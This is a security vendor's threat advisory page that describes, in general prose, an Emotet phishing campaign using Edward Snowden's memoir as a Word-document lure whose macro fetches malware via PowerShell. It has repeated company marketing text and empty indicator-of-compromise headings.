Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
High
Emotet recently resumed spear phishing attacks, incorporating the news about NSA whistleblower Edward Snowden’s new book Permanent Record as a lure. The memoir is already on Amazon’s bestseller list. Criminals tend to generate monetary benefits from such newsworthy events for scams and other social engineering purposes. In this particular case, Emotet authors are supposedly offering Snowden’s memoir as a Word attachment. Emails of this phishing campaign were found in English, Italian, Spanish, German and French, as shown below.
When the document is opened, a fake message appears that “Word hasn’t been activated”. When victims click on “Enable Content” appearing with a security warning, a malicious macro code is executed.
The macro triggers a PowerShell command that will retrieve the Emotet malware binary from a compromised WordPress site. After infection, the machine will attempt to reach out to one of Emotet’s many C2s.
IP(s) / Hostname(s)
URLs
Malware Hash (MD5/SHA1/SH256)